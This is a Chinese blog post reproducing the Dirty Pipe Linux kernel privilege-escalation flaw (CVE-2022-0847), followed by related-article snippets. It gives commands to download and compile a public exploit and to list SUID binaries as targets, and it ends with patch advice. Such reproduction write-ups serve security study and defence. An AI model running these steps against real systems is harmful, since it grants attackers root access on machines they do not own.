Linux Kernel本地提权漏洞(CVE-2022-0847)漏洞复现

已于 2022-03-08 14:25:28 修改
阅读量2.6k 收藏 5
点赞数 3
分类专栏: 内网 文章标签: 安全
于 2022-03-08 14:23:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/123352627
版权

参考: TeamsSix
参考链接:https://mp.weixin.qq.com/s/6VebZCKAv6kkmQme4GCQ_w

0x00 前言

CVSS 评分:7.8
影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102
RT 通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root
这个漏洞作者将其命名为了 Dirty Pipe,一看到这名字讲道理就让人想到了 Dirty Cow,这是因为该漏洞的原理比较类似于 Dirty Cow,但这个漏洞更容易被利用。

0x01 漏洞检测

检测的方法很简单,直接 uname -r ,如果 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102 说明可能受到该漏洞的影响。

0x02 漏洞复现

方法二:dirtypipez.c

mkdir dirtypipez
cd dirtypipez
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez

编译后生成可执行文件dirtypipez

在这里插入图片描述

find / -perm -u=s -type f 2>/dev/null

选一个有suid权限的
在这里插入图片描述

复现成功

在这里插入图片描述

0x03 安全建议

目前此漏洞已经在Linux 内核 5.16.11、5.15.25 和 5.10.102 中修复。鉴于此漏洞很容易利用以获得root权限,且漏洞利用已经公开,建议受影响用户及时升级更新。

下载链接:

https://kernel.org/

参考: https://www.venustech.com.cn/new_type/aqtg/20220308/23532.html
https://mp.weixin.qq.com/s/6VebZCKAv6kkmQme4GCQ_w

明月清风~~
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
新版脏牛Linux内核漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel < 5.16.11 / 5.15.25 / 5.10.102中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致升,因为非特进程可以将代码注入根进程。 修版本:Linux 5.16.11、5.15.25 和 5.10.102 中修
CVE-2022-0847Linux内核漏洞
xhwfa的博客
03-16 5427
一、漏洞详情 3月7日,研究人员公开披露了Linux内核中的一个漏洞CVE-2022-0847,也称为"Dirty Pipe"),允许非特用户注入和覆盖任意只读文件中的数据,导致升,并最终获得root限。该漏洞影响了Linux Kernel 5.8及更高版本,甚至影响了Android设备。 CVE-2022-0847漏洞类似于 2016 年修的Dirty COW漏洞,即脏牛漏洞 (CVE-2016-5195),但它更容易被利用,目前此漏洞的POC/EXP已经发布。 二、漏洞影响版
CVE-2024-1086 Linux kernel nf_tables 本地漏洞方法--多种方式,亲测!!!
最新发布
qq_21160025的博客
06-03 8420
CVE-2024-1086 Linux kernel nf_tables 本地漏洞
CVE-2022-0847记录
CoLin的pwn小屋
03-16 1081
CVE-2022-0847 记录
linux-kali内核漏洞CVE-2022-0847)
tlovejr的博客
03-08 2232
linux-kali内核漏洞CVE-2022-0847) 漏洞介绍 这是 CVE-2022-0847 的故事,它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致升,因为非特进程可以将代码注入根进程。 它类似于CVE-2016-5195 “Dirty Cow”,但更容易被利用。 该漏洞已 在 Linux 5.16.11、5.15.25 和 5.10.102 中修漏洞影响版本 Linux kali 5.10.0-kali7-amd64 #1 S
CVE-2022-0847(脏管道)
m0_62207170的博客
02-28 288
CVE-2022-0847
漏洞#CVE-2022-0847(Linux内核)
weixin_52763014的博客
09-13 305
使用uname -r命令,查看当前内核版本,一般在 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102版本以内,可以受影响。如果你使用的是linux18.04版本安装起来应该是没什么问题,由于我已经安装过了,所以这里不展示效果。可以看到有很多,你可以找一个你看的顺眼的,我这里使用的是/bin/ping。环境配置时间可能较长,可以同上面链接,了解漏洞,如何产生以及漏洞特性。好的失败了,那位大佬的文章的一样没成功,我抱着侥幸的心里试试,也不行。漏洞(两个方法)
麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3
03-15
麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关...
麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包2
03-15
麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包2麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包2麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关...
麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包5
03-15
麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包5 麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关依赖包5 麒麟Linux kernel本地漏洞(CVE-2022-0847)漏洞补丁及相关...
学习打靶--CVE-2022-0847--pingme(1)
m0_57276559的博客
06-09 1867
打靶学习---pingme
Linux kernel安全漏洞方法(CNNVD-202203-522、CVE-2022-0847)
zhangyuxun3的博客
03-30 2390
漏洞详情: Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。Linux kernel存在安全漏洞,攻击者可利用漏洞覆盖重写任意可读文件中的数据,从而将普通限的用户升到root限用户。 漏洞评级: 高危漏洞 影响范围: Linux Kernel 5.8-5.16.11、5.8-5.15.25、5.8-5.10.102等版本均受此漏洞影响。 修方案 本文以Centos7为例,具体操作步骤如下: #CentOS 7 上启用 ELRepo 仓库 rpm --impor
linux】内核本地漏洞(CVE-2019-13272)
Kris__zhang的博客
05-11 1912
漏洞描述 kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问限 进程关系,父进程删除限并调用execve(可能允许攻击者控制)。 一个影响因素是对象寿命问题(也可能导致恐慌)。 另一个影响因素是将ptrace关系标记为特,这可以通过(例如)Polkit的pkexec帮助程序与PTRACE_TRACEME进行利用。获取root限。 只可在界面模式下利用,总体实际使用比较鸡肋 影响版本
Linux Kernel 漏洞CVE-2023-32233
m0_48722220的博客
08-02 1429
Linux Netfilter 是一个在 Linux 内核中的网络数据包处理框架,也称作 iptables,它可以通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理,是 Linux 系统网络安全性和可靠性的重要组成部分。
Linux-dirty pipe内核漏洞-编号:CVE-2022-0847
╲ゞ紅桃K
08-31 1292
漏洞属于Linux漏洞, 攻击者可利用该漏洞使任何非特(本地)用户在易受攻击的主机上获得root限,非特进程可以将代码注入到根进程使得攻击者可获取服务器的所有限。与该漏洞CVE-2022-0847(Dirty Pipe)类似的另一个漏洞CVE-2016-5195 “Dirty Cow”(脏牛),很多人应该了解并且能利用该漏洞。...
linuxCVE-2022-0847
liu_jia_liang的博客
03-14 6846
0x01 漏洞详情 3月7日,研究人员公开披露了Linux 内核中的一个漏洞CVE-2022-0847,也称为“Dirty Pipe”),允许非特用户注入和覆盖任意只读文件中的数据,导致升,并最终获得root限。该漏洞影响了 Linux Kernel 5.8 及更高版本,甚至影响了Android设备。 CVE-2022-0847漏洞类似于 2016 年修的 Dirty COW 漏洞 (CVE-2016-5195),但它更容易被利用,目前此漏洞的PoC/EXP已经发布。 0x0
Linux Privilege Escalation Kernel Exploits | Linux本地内核漏洞 CVE-2015-1328
Shadow_DAI_990101的博客
09-04 896
漏洞源于overlayfs文件系统在上层文件系统目录中创建新文件时没有正确检查文件限。它只检查了被修改文件的属主是否有限在上层文件系统目录写入,导致当从底层文件系统目录中拷贝一个文件到上层文件系统目录时,文件属性也随同拷贝过去。如果Linux内核设置了CONFIG_USER_NS=y和FS_USERNS_MOUNT标志,将允许一个普通用户在低限用户命名空间中mout一个overlayfs文件系统。本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容,从而升到管理员限。
Linux内核漏洞CVE-2022-0874
weixin_48421613的博客
03-08 807
官方漏洞通告: https://access.redhat.com/security/cve/cve-2022-0847 受影响的版本: 5.8<=Linux kernel<5.16.11/5.15.25/5.10.102​ ​ 过程如下: 首先我的exp是在github上下载的 https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit. 访问不了的可以公众号回 0005即可获取exp 我这里使用的测试机器是kali2022
如何修linux漏洞 CVE-2022-0847
07-15
要修Linux漏洞CVE-2022-0847,您可以按照以下步骤进行操作: 1. 更新系统:确保您的系统已经更新到最新的软件包版本。使用以下命令更新软件包: ``` sudo apt update sudo apt upgrade ``` 2. 安装补丁:检查是否有适用于CVE-2022-0847漏洞的补丁可用。如果有,请使用以下命令安装补丁: ``` sudo apt install <补丁包名称> ``` 如果没有特定的补丁可用,您可以考虑升级相关软件包来修漏洞。 3. 验证修:在安装完补丁或升级后,重新启动相关服务或系统,并验证漏洞是否已修。您可以参考相关文档或咨询相关社区以获取更多信息。 请注意,具体的修步骤可能因操作系统版本、Linux发行版和漏洞的具体细节而有所不同。因此,在执行任何操作之前,建议您先仔细阅读相关文档,并确保了解适用于您的系统的正确修方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值